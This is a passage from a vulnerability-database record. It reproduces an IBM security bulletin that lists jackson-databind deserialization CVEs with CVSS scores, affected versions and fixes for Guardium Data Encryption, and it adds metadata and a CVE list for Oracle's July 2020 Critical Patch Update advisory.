local files on the server. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/162875](<https://exchange.xforce.ibmcloud.com/vulnerabilities/162875>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2019-12384](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12384>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by the failure to block the logback-core class from polymorphic deserialization. By sending a specially-crafted JSON message, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/162849](<https://exchange.xforce.ibmcloud.com/vulnerabilities/162849>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-12086](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12086>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by a Polymorphic Typing issue that occurs due to missing com.mysql.cj.jdbc.admin.MiniAdmin validation. By sending a specially-crafted JSON message, a remote attacker could exploit this vulnerability to read arbitrary local files on the server. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/161256](<https://exchange.xforce.ibmcloud.com/vulnerabilities/161256>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-7489](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7489>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by a deserialization flaw in the readValue method of the ObjectMapper. By sending specially crafted JSON input, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/139549](<https://exchange.xforce.ibmcloud.com/vulnerabilities/139549>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2018-5968](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5968>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by deserialization flaws. By using two different gadgets that bypass a blocklist, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/138088](<https://exchange.xforce.ibmcloud.com/vulnerabilities/138088>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2018-19362](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19362>) \n** DESCRIPTION: **An unspecified error with failure to block the jboss-common-core class from polymorphic deserialization in FasterXML jackson-databind has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155093](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155093>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2018-19361](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19361>) \n** DESCRIPTION: **An unspecified error with failure to block the openjpa class from polymorphic deserialization in FasterXML jackson-databind has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155092](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155092>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2018-19360](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19360>) \n** DESCRIPTION: **An unspecified error with failure to block the axis2-transport-jms class from polymorphic deserialization in FasterXML jackson-databind has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155091](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155091>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2018-14721](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14721>) \n** DESCRIPTION: **FasterXML jackson-databind is vulnerable to server-side request forgery, caused by the failure to block the axis2-jaxws class from polymorphic deserialization. A remote authenticated attacker could exploit this vulnerability to obtain sensitive data. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155136](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155136>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-14720](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14720>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by an XML external entity (XXE) error when processing XML data by JDK classes. By sending a specially-crafted XML data. A remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155137](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155137>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-14719](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14719>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by the failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155138](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155138>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-14718](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14718>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by the failure to block the slf4j-ext class from polymorphic deserialization. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155139](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155139>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-12023](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12023>) \n** DESCRIPTION: **An unspecified vulnerability in multiple Oracle products could allow an unauthenticated attacker to take control of the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/151425](<https://exchange.xforce.ibmcloud.com/vulnerabilities/151425>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-12022](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12022>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by a flaw when the Default Typing is enabled. By sending a specially-crafted request in LDAP service, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/163227](<https://exchange.xforce.ibmcloud.com/vulnerabilities/163227>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-11307](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11307>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by an issue when untrusted content is deserialized with default typing enabled. By sending specially-crafted content over FTP, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/163528](<https://exchange.xforce.ibmcloud.com/vulnerabilities/163528>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-1000873](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000873>) \n** DESCRIPTION: **FasterXML jackson-databind is vulnerable to a denial of service, caused by improper input validation by the nanoseconds time value field. By persuading a victim to deserialize specially-crafted input, a remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/154804](<https://exchange.xforce.ibmcloud.com/vulnerabilities/154804>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2017-7525](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7525>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a deserialization flaw within the Jackson JSON library in the readValue method of the ObjectMapper. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/134639](<https://exchange.xforce.ibmcloud.com/vulnerabilities/134639>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2017-17485](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17485>) \n** DESCRIPTION: **Jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the default-typing feature. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/137340](<https://exchange.xforce.ibmcloud.com/vulnerabilities/137340>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2017-15095](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15095>) \n** DESCRIPTION: **Jackson Library could allow a remote attacker to execute arbitrary code on the system, caused by a deserialization flaw in the readValue() method of the ObjectMapper. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/135123](<https://exchange.xforce.ibmcloud.com/vulnerabilities/135123>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nGDE| 3.0.0.2 \n \n\n\n## Remediation/Fixes\n\nProduct(s)| Fixed Version \n---|--- \nGDE| [4.0.0.4](<https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=800f008fdb1ce41080b2345239961960&sysparm_article=KB0023194sys_kb_id=9269c25b1b795410f2888739cd4bcb16> \"4.0.0.0\" ) \n \n## Workarounds and Mitigations\n\nAffected Component| Fixed Version \n---|--- \nIBM Guardium for Cloud Key Management (GCKM)| GCKM 1.8.0 \n \n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n05 Jan 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSPPK\",\"label\":\"IBM Guardium Data Encryption\"},\"Component\":\"IBM Guardium for Cloud Key Management (GCKM)\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"3.0.0.2,4.0.0.4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-01-12T14:42:24", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in IBM Guardium Data Encryption (GDE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3674", "CVE-2016-9878", "CVE-2017-15095", "CVE-2017-17485", "CVE-2017-4995", "CVE-2017-7525", "CVE-2017-7957", "CVE-2018-1000632", "CVE-2018-1000873", "CVE-2018-10237", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-11307", "CVE-2018-1199", "CVE-2018-12022", "CVE-2018-12023", "CVE-2018-1257", "CVE-2018-1270", "CVE-2018-1271", "CVE-2018-1272", "CVE-2018-1275", "CVE-2018-14718", "CVE-2018-14719", "CVE-2018-14720", "CVE-2018-14721", "CVE-2018-15756", "CVE-2018-19360", "CVE-2018-19361", "CVE-2018-19362", "CVE-2018-5968", "CVE-2018-7489", "CVE-2019-11272", "CVE-2019-12086", "CVE-2019-12384", "CVE-2019-12814", "CVE-2019-3774", "CVE-2019-3795", "CVE-2019-4160", "CVE-2019-4687", "CVE-2019-4702"], "modified": "2021-01-12T14:42:24", "id": "366CE799D9AEE4234CE4D38A22D774A769300127F0319D9238DAEC27C48436E1", "href": "https://www.ibm.com/support/pages/node/6403331", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oracle": [{"lastseen": "2021-10-22T15:44:19", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Please refer to:\n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/security-alerts>) for information about Oracle Security advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 444 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ July 2020 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2684313.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - July 2020", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501", "CVE-2015-8607", "CVE-2015-8608", "CVE-2015-9251", "CVE-2016-0701", "CVE-2016-1000031", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-1923", "CVE-2016-1924", "CVE-2016-2183", "CVE-2016-2381", "CVE-2016-3183", "CVE-2016-4000", "CVE-2016-4796", "CVE-2016-4797", "CVE-2016-5017", "CVE-2016-5019", "CVE-2016-6306", "CVE-2016-6814", "CVE-2016-8332", "CVE-2016-8610", "CVE-2016-9112", "CVE-2016-9840", "CVE-2016-9841", "CVE-2016-9842", "CVE-2016-9843", "CVE-2017-0861", "CVE-2017-10140", "CVE-2017-12610", "CVE-2017-12626", "CVE-2017-12814", "CVE-2017-12837", "CVE-2017-12883", "CVE-2017-15265", "CVE-2017-15708", "CVE-2017-5637", "CVE-2017-5645", "CVE-2018-1000004", "CVE-2018-1000632", "CVE-2018-10237", "CVE-2018-10675", "CVE-2018-10872", "CVE-2018-10901", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-11054", "CVE-2018-11055", "CVE-2018-11056", "CVE-2018-11057", "CVE-2018-11058", "CVE-2018-11776", "CVE-2018-1199", "CVE-2018-12015", "CVE-2018-12023", "CVE-2018-12207", "CVE-2018-1257", "CVE-2018-1258", "CVE-2018-1270", "CVE-2018-1271", "CVE-2018-1272", "CVE-2018-1275", "CVE-2018-1288", "CVE-2018-15756", "CVE-2018-15769", "CVE-2018-17190", "CVE-2018-17196", "CVE-2018-18311", "CVE-2018-18312", "CVE-2018-18313", "CVE-2018-18314", "CVE-2018-3620", "CVE-2018-3639", "CVE-2018-3646", "CVE-2018-3665", "CVE-2018-3693", "CVE-2018-5390", "CVE-2018-6616", "CVE-2018-6797", "CVE-2018-6798", "CVE-2018-6913", "CVE-2018-7566", "CVE-2018-8012", "CVE-2018-8013", "CVE-2018-8032", "CVE-2018-8088", "CVE-2019-0188", "CVE-2019-0201", "CVE-2019-0220", "CVE-2019-0222", "CVE-2019-0227", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10086", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10192", "CVE-2019-10193", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-11358", "CVE-2019-12086", "CVE-2019-12384", "CVE-2019-12402", "CVE-2019-12415", "CVE-2019-12423", "CVE-2019-12814", "CVE-2019-12973", "CVE-2019-13990", "CVE-2019-14379", "CVE-2019-14439", "CVE-2019-14540", "CVE-2019-14862", "CVE-2019-14893", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1551", "CVE-2019-1552", "CVE-2019-1563", "CVE-2019-16056", "CVE-2019-16335", "CVE-2019-16935", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17091", "CVE-2019-17267", "CVE-2019-17359", "CVE-2019-17531", "CVE-2019-17560", "CVE-2019-17561", "CVE-2019-17563", "CVE-2019-17569", "CVE-2019-17571", "CVE-2019-17573", "CVE-2019-19956", "CVE-2019-20330", "CVE-2019-20388", "CVE-2019-2094", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-2904", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-5427", "CVE-2019-5489", "CVE-2019-8457", "CVE-2020-10650", "CVE-2020-10672", "CVE-2020-10673", "CVE-2020-10683", "CVE-2020-10968", "CVE-2020-10969", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11111", "CVE-2020-11112", "CVE-2020-11113", "CVE-2020-11619", "CVE-2020-11620", "CVE-2020-11655", "CVE-2020-11656", "CVE-2020-13434", "CVE-2020-13435", "CVE-2020-13630", "CVE-2020-13631", "CVE-2020-13632", "CVE-2020-14527", "CVE-2020-14528", "CVE-2020-14529", "CVE-2020-14530", "CVE-2020-14531", "CVE-2020-14532", "CVE-2020-14533", "CVE-2020-14534", "CVE-2020-14535", "CVE-2020-14536", "CVE-2020-14537", "CVE-2020-14539", "CVE-2020-14540", "CVE-2020-14541", "CVE-2020-14542", "CVE-2020-14543", "CVE-2020-14544", "CVE-2020-14545", "CVE-2020-14546", "CVE-2020-14547", "CVE-2020-14548", "CVE-2020-14549", "CVE-2020-14550", "CVE-2020-14551", "CVE-2020-14552", "CVE-2020-14553", "CVE-2020-14554", "CVE-2020-14555", "CVE-2020-14556", "CVE-2020-14557", "CVE-2020-14558", "CVE-2020-14559", "CVE-2020-14560", "CVE-2020-14561", "CVE-2020-14562", "CVE-2020-14563", "CVE-2020-14564", "CVE-2020-14565", "CVE-2020-14566", "CVE-2020-14567", "CVE-2020-14568", "CVE-2020-14569", "CVE-2020-14570", "CVE-2020-14571", "CVE-2020-14572", "CVE-2020-14573", "CVE-2020-14574", "CVE-2020-14575", "CVE-2020-14576", "CVE-2020-14577", "CVE-2020-14578", "CVE-2020-14579", "CVE-2020-14580", "CVE-2020-14581", "CVE-2020-14582", "CVE-2020-14583", "CVE-2020-14584", "CVE-2020-14585", "CVE-2020-14586", "CVE-2020-14587", "CVE-2020-14588", "CVE-2020-14589", "CVE-2020-14590", "CVE-2020-14591", "CVE-2020-14592", "CVE-2020-14593", "CVE-2020-14594", "CVE-2020-14595", "CVE-2020-14596", "CVE-2020-14597", "CVE-2020-14598", "CVE-2020-14599", "CVE-2020-14600", "CVE-2020-14601", "CVE-2020-14602", "CVE-2020-14603", "CVE-2020-14604", "CVE-2020-14605", "CVE-2020-14606", "CVE-2020-14607", "CVE-2020-14608", "CVE-2020-14609", "CVE-2020-14610", "CVE-2020-14611", "CVE-2020-14612", "CVE-2020-14613", "CVE-2020-14614", "CVE-2020-14615", "CVE-2020-14616", "CVE-2020-14617", "CVE-2020-14618", "CVE-2020-14619", "CVE-2020-14620", "CVE-2020-14621", "CVE-2020-14622", "CVE-2020-14623", "CVE-2020-14624", "CVE-2020-14625", "CVE-2020-14626", "CVE-2020-14627", "CVE-2020-14628", "CVE-2020-14629", "CVE-2020-14630", "CVE-2020-14631", "CVE-2020-14632", "CVE-2020-14633", "CVE-2020-14634", "CVE-2020-14635", "CVE-2020-14636", "CVE-2020-14637", "CVE-2020-14638", "CVE-2020-14639", "CVE-2020-14640", "CVE-2020-14641", "CVE-2020-14642", "CVE-2020-14643", "CVE-2020-14644", "CVE-2020-14645", "CVE-2020-14646", "CVE-2020-14647", "CVE-2020-14648", "CVE-2020-14649", "CVE-2020-14650", "CVE-2020-14651", "CVE-2020-14652", "CVE-2020-14653", "CVE-2020-14654", "CVE-2020-14655", "CVE-2020-14656", "CVE-2020-14657", "CVE-2020-14658", "CVE-2020-14659", "CVE-2020-14660", "CVE-2020-14661", "CVE-2020-14662", "CVE-2020-14663", "CVE-2020-14664", "CVE-2020-14665", "CVE-2020-14666", "CVE-2020-14667", "CVE-2020-14668", "CVE-2020-14669", "CVE-2020-14670", "CVE-2020-14671", "CVE-2020-14673", "CVE-2020-14674", "CVE-2020-14675", "CVE-2020-14676", "CVE-2020-14677", "CVE-2020-14678", "CVE-2020-14679", "CVE-2020-14680", "CVE-2020-14681", "CVE-2020-14682", "CVE-2020-14684", "CVE-2020-14685", "CVE-2020-14686", "CVE-2020-14687", "CVE-2020-14688", "CVE-2020-14690", "CVE-2020-14691", "CVE-2020-14692", "CVE-2020-14693", "CVE-2020-14694", "CVE-2020-14695", "CVE-2020-14696", "CVE-2020-14697", "CVE-2020-14698", "CVE-2020-14699", "CVE-2020-14700", "CVE-2020-14701", "CVE-2020-14702", "CVE-2020-14703", "CVE-2020-14704", "CVE-2020-14705", "CVE-2020-14706", "CVE-2020-14707", "CVE-2020-14708", "CVE-2020-14709", "CVE-2020-14710", "CVE-2020-14711", "CVE-2020-14712", "CVE-2020-14713", "CVE-2020-14714", "CVE-2020-14715", "CVE-2020-14716", "CVE-2020-14717", "CVE-2020-14718", "CVE-2020-14719", "CVE-2020-14720", "CVE-2020-14721", "CVE-2020-14722", "CVE-2020-14723", "CVE-2020-14724", "CVE-2020-14725", "CVE-2020-1927", "CVE-2020-1934", "CVE-2020-1935", "CVE-2020-1938", "CVE-2020-1941", "CVE-2020-1945", "CVE-2020-1950", "CVE-2020-1951", "CVE-2020-1967", "CVE-2020-2513", "CVE-2020-2555", "CVE-2020-2562", "CVE-2020-2966", "CVE-2020-2967", "CVE-2020-2968", "CVE-2020-2969", "CVE-2020-2971", "CVE-2020-2972", "CVE-2020-2973", "CVE-2020-2974", "CVE-2020-2975", "CVE-2020-2976", "CVE-2020-2977", "CVE-2020-2978", "CVE-2020-2981", "CVE-2020-2982", "CVE-2020-2983", "CVE-2020-2984", "CVE-2020-5258", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-6851", "CVE-2020-7059", "CVE-2020-7060", "CVE-2020-7595", "CVE-2020-8112", "CVE-2020-8172", "CVE-2020-9327", "CVE-2020-9484", "CVE-2020-9488", "CVE-2020-9546", "CVE-2020-9547", "CVE-2020-9548"], "modified": "2020-12-01T00:00:00", "id": "ORACLE:CPUJUL2020", "href": "https://www.oracle.com/security-alerts/cpujul2020.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}